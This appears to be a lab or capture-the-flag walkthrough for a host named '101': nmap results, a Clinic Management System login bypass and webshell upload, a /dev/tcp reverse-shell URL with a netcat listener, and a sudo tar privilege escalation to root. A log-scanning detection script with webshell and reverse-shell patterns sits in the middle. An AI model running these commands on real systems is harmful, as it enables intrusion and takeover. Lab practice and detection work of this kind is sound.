
101
----------------------

-scan with nmap/masscan for all ports

21/tcp open ftp vsftpd 3.0.3
|ftp-anon: got code 500 "OOPS: vsftpd: refusing to run with writable root inside chroot()".
22/tcp open ssh OpenSSH 8.3 (protocol 2.0)
| ssh-hostkey:
| 3072 5c:de:3d:4e:d1:65:59:e5:e4:75:08:d9:72:0a:ba:01 (RSA)
| 256 70:35:47:ae:6d:f9:64:7b:e5:84:da:a8:bd:18:bd:5f (ECDSA)
| 256 bc:59:39:14:9a:9f:6e:da:4a:37:3c:80:80:f0:a7:9d (ED25519)
80/tcp open http Apache httpd 2.4.43 ((Fedora) OpenSSL/1.1.1g)
| http-git:
| 192.168.x.101:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/mikepfeiffer/simple-php-app
|_http-server-header: Apache/2.4.43 (Fedora) OpenSSL/1.1.1g
|http-title: PHP Application - AWS Elastic Beanstalk
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
139/tcp open netbios-ssn Samba smbd 4.6.2
443/tcp open ssl/http Apache httpd 2.4.43 ((Fedora) OpenSSL/1.1.1g)
| http-git:
| 192.168.x.101:443/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/mikepfeiffer/simple-php-app
|_http-server-header: Apache/2.4.43 (Fedora) OpenSSL/1.1.1g
|_http-title: PHP Application - AWS Elastic Beanstalk
| ssl-cert: Subject: commonName=hector/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:hector
| Not valid before: 2020-06-26T18:22:08
|_Not valid after: 2021-07-01T20:02:08
|ssl-date: TLS randomness does not represent time
| tls-alpn:
| http/1.1
445/tcp open netbios-ssn Samba smbd 4.6.2
3306/tcp open mysql?
| fingerprint-strings:
| JavaRMI, LDAPBindReq, LPDString, NULL, X11Probe, giop, ms-sql-s:
| Host '192.168.X.X' is not allowed to connect to this MariaDB server
7080/tcp open http Apache httpd 2.4.43 ((Fedora) OpenSSL/1.1.1g)
| http-cookie-flags:
| /:
| PHPSESSID:
| httponly flag not set
|_http-server-header: Apache/2.4.43 (Fedora) OpenSSL/1.1.1g
| http-title: Admin Panel
|_Requested resource was login.php
8080/tcp open http Apache Tomcat 9.0.39
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.39
1 service unrecognized despite returning data. If you know the service/v

----------------------------------------------------------------------------------

-port 7080,

-go to login.php; you will see this login page.

Actually, it is the Clinic Management System.

https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html

Read the exploits carefully.

Exploit to bypass login : https://www.exploit-db.com/exploits/48538


-use burp (Community Version Only) to bypass login

exploit to RCE : https://www.exploit-db.com/exploits/48544


-http://192.168.X.101:7080/manage_website.php upload webshell.php
-exec at uploadImage/Logo

-catch rev shell http://192.168.X.101:7080/uploadImage/Logo/webshell.php?cmd=bash%20-i%3E%26%20/dev/tcp/192.168.X.X/445%200%3E%261

(change the IP address; lport should be 445)

nc -nvlp 445
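As an added detection example (not part of the original notes), the script below scans constructed Apache access-log lines for the activity described above: a script executed from the uploadImage/Logo directory, a shell command passed in a `cmd` query parameter, and requests to the exposed .git/ directory that nmap reported. The upload root, log format and IP addresses are assumptions.

```python
"""Flag web-shell and exposed-.git activity in Apache access logs (added example)."""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample lines in Apache combined format; IPs are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Jun/2020:18:30:01 +0000] "GET /login.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Jun/2020:18:30:44 +0000] "POST /manage_website.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [26/Jun/2020:18:31:02 +0000] "GET /uploadImage/Logo/webshell.php?cmd=bash%20-i%3E%26%20/dev/tcp/10.0.0.5/445%200%3E%261 HTTP/1.1" 200 12 "-" "curl/7.68.0"
10.0.0.9 - - [26/Jun/2020:18:32:10 +0000] "GET /uploadImage/Logo/clinic.png HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
10.0.0.9 - - [26/Jun/2020:18:33:00 +0000] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')
UPLOAD_DIRS = ("/uploadImage/",)            # assumption: the application's upload root
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")
CMD_PARAMS = ("cmd", "c", "exec")
SHELL_MARKERS = ("/dev/tcp/", "bash -i", "sh -c", "|", ";", "&&")

def analyse_line(line):
    """Return a finding dict for a suspicious request, or None for benign lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path = unquote(parts.path)
    reasons = []
    # A server-side script served from a directory that should only hold images.
    if path.startswith(UPLOAD_DIRS) and path.lower().endswith(SCRIPT_EXT):
        reasons.append("script executed from upload directory")
    # A query parameter that names or carries a shell command.
    for key, values in parse_qs(parts.query).items():
        if key.lower() in CMD_PARAMS or any(mk in v for v in values for mk in SHELL_MARKERS):
            reasons.append(f"shell command in query parameter '{key}'")
            break
    # Anyone fetching .git/ objects is pulling the application's source.
    if path.startswith("/.git/"):
        reasons.append("request for exposed .git repository")
    if not reasons:
        return None
    return {"ip": m["ip"], "time": m["ts"], "path": path,
            "status": int(m["status"]), "reasons": reasons}

def scan_log(text):
    """Run analyse_line over every line and keep the findings."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

Blocking access to .git/ in the web server configuration and refusing script extensions in the upload handler removes both signals at the source; the log check is the compensating control.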

-run /usr/bin/bash -p

We need to edit backup.sh to get a shell as sammy.

When we get the sammy shell, run:

sudo -l or cat /etc/sudoers

-and use GTFOBins to priv esc

sudo /usr/bin/tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/usr/bin/bash

#ROOT
